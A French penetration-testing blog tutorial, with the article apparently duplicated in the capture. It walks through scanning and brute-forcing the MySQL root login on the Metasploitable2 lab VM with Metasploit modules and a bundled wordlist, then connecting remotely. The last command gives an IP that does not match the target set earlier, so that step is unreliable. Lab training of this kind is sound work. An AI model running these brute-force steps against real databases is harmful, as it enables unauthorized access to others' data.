top of page
cloud-vds.png
  • 2 Base de données

  • 2 VPS AMD

  • 4 instances ARM

  • Stockage 100 Go

  • 50k appels API

theme-light-dark-white.png
Photo du rédacteurNeo is calling you

Hacker une base de donnée de type MYSQL avec Metasploit - Attaque bruteforce sur Metasploitable

Lors de cette présentation le système Kali-Linux sera utilisé en tant qu'attaquant et le système Metasploitable2 en tant que victime.


La base de donnée mysql fonctionnant par défaut sur le port 3306 sera ciblée.


Le framework metasploit va être utilisé. Pour cela il faut ouvrir un nouveau terminal sur le système attaquant puis exécuter la commande msfconsole.


msfconsole

Premièrement il peut être intéressant d'ouvrir un module auxiliaire pour effectuer un scan qui identifiera la version mysql utilisée. Il faut pour cela utilisé la commande use et indiquer le chemin module auxiliary/scanner/mysql/mysql_version à utiliser pour effectuer le scan.


use auxiliary/scanner/mysql/mysql_version

Maintenant que le module est chargé, les options peuvent être consultés avec la commande show options et devront ensuite être définies.


show options

L'option RHOSTS doit être définit car la colonne Required indique yes et que la colonne Current Setting est actuellement vide.


Pour définir une option il faut utiliser la commande set suivit du nom de l'option RHOSTS puis de sa valeur 192.168.133.128, l'adresse IP de notre cible. (IP à adapter)


set RHOSTS 192.168.133.128

Si la base de données ciblée est ouverte sur un autre port que 3306 il faudra le changer à l'aide de l'option RPORT.


La commande run est à utilisé pour lancer le module sélectionné.


run

Ce scan récupère la version utilisée par MYSQL et ne fait rien de néfaste.

Ici la version récupérée est la 5.0.


Une fois arrivée ici il y a plusieurs façon de procéder pour pénétrer la base de données.

La plus évidente consiste à utiliser les identifiants de connexions d'un utilisateur disposant de privilèges tel que l'utilisateur root.


La méthode la plus utilisée est bien entendue une attaque par force brute qui consiste à utiliser un grand nombre de combinaisons d'identifiants/mots de passe différentes.


Pour effectuer cette attaque il faudra utiliser un autre module accessible par le chemin auxiliary/scanner/mysql/mysql_login qui sera à indiquer avec la commande use.


use auxiliary/scanner/mysql/mysql_login

Comme avec le module précédemment il est toujours bien de consulter les options.


show options

L'adresse IP de la cible distante RHOSTS doit être saisie à nouveau.


set RHOSTS 192.168.133.128

La liste des mots de passe qui seront à essayer pour ouvrir la session doit être définit grâce à l'option USERPASS_FILE. Il en existe une adaptée déjà accessible depuis le répertoire de metasploit avec le chemin /usr/share/metasploit-framework/data/wordlists/root_userpass.txt


set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt

L'option du nom d'utilisateur USERNAME est déjà définit avec la valeur root et peut être changée si nécessaire.


Pour lancer l'attaque par force brute il faut à nouveau utiliser la commande run.


run

Le système indique qu'il a réussi à s'identifier à la ligne Success : 'root: '

Le fait qu'il n'y ai pas de mot de passe après root signifie que le compte n'était pas protégé par un mot de passe. Cela est du au fait que la cible est un Metasploitable 2 conçu pour être extrêmement vulnérable.


Maintenant que les identifiants ont été trouvé il est possible d'établir une connexion distante avec la commande mysql -u username -h ip_address -p.


mysql -u root -h 192.168.128.133 -p

Il est maintenant facile d'explorer le contenu du système de gestion de base de données.

 

D'autres pages sont disponibles pour en apprendre plus sur les tests d'intrusions.

Posts similaires

Voir tout

1 Comment


Pimento
Nov 15, 2023

QUand je tente de me connecter à la base de données : mysql -u root -h 192.168.128.133 -p J'obtiens l'erreur : ERROR 2026 (HY000): TLS/SSL error: wrong version number Un incide ?

Like

Hacker une base de donnée de type MYSQL avec Metasploit - Attaque bruteforce sur Metasploitable

Lors de cette présentation le système Kali-Linux sera utilisé en tant qu'attaquant et le système Metasploitable2 en tant que victime.


La base de donnée mysql fonctionnant par défaut sur le port 3306 sera ciblée.


Le framework metasploit va être utilisé. Pour cela il faut ouvrir un nouveau terminal sur le système attaquant puis exécuter la commande msfconsole.


msfconsole

Premièrement il peut être intéressant d'ouvrir un module auxiliaire pour effectuer un scan qui identifiera la version mysql utilisée. Il faut pour cela utilisé la commande use et indiquer le chemin module auxiliary/scanner/mysql/mysql_version à utiliser pour effectuer le scan.


use auxiliary/scanner/mysql/mysql_version

Maintenant que le module est chargé, les options peuvent être consultés avec la commande show options et devront ensuite être définies.


show options

L'option RHOSTS doit être définit car la colonne Required indique yes et que la colonne Current Setting est actuellement vide.


Pour définir une option il faut utiliser la commande set suivit du nom de l'option RHOSTS puis de sa valeur 192.168.133.128, l'adresse IP de notre cible. (IP à adapter)


set RHOSTS 192.168.133.128

Si la base de données ciblée est ouverte sur un autre port que 3306 il faudra le changer à l'aide de l'option RPORT.


La commande run est à utilisé pour lancer le module sélectionné.


run

Ce scan récupère la version utilisée par MYSQL et ne fait rien de néfaste.

Ici la version récupérée est la 5.0.


Une fois arrivée ici il y a plusieurs façon de procéder pour pénétrer la base de données.

La plus évidente consiste à utiliser les identifiants de connexions d'un utilisateur disposant de privilèges tel que l'utilisateur root.


La méthode la plus utilisée est bien entendue une attaque par force brute qui consiste à utiliser un grand nombre de combinaisons d'identifiants/mots de passe différentes.


Pour effectuer cette attaque il faudra utiliser un autre module accessible par le chemin auxiliary/scanner/mysql/mysql_login qui sera à indiquer avec la commande use.


use auxiliary/scanner/mysql/mysql_login

Comme avec le module précédemment il est toujours bien de consulter les options.


show options

L'adresse IP de la cible distante RHOSTS doit être saisie à nouveau.


set RHOSTS 192.168.133.128

La liste des mots de passe qui seront à essayer pour ouvrir la session doit être définit grâce à l'option USERPASS_FILE. Il en existe une adaptée déjà accessible depuis le répertoire de metasploit avec le chemin /usr/share/metasploit-framework/data/wordlists/root_userpass.txt


set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt

L'option du nom d'utilisateur USERNAME est déjà définit avec la valeur root et peut être changée si nécessaire.


Pour lancer l'attaque par force brute il faut à nouveau utiliser la commande run.


run

Le système indique qu'il a réussi à s'identifier à la ligne Success : 'root: '

Le fait qu'il n'y ai pas de mot de passe après root signifie que le compte n'était pas protégé par un mot de passe. Cela est du au fait que la cible est un Metasploitable 2 conçu pour être extrêmement vulnérable.


Maintenant que les identifiants ont été trouvé il est possible d'établir une connexion distante avec la commande mysql -u username -h ip_address -p.


mysql -u root -h 192.168.128.133 -p

Il est maintenant facile d'explorer le contenu du système de gestion de base de données.

 

D'autres pages sont disponibles pour en apprendre plus sur les tests d'intrusions.

bottom of page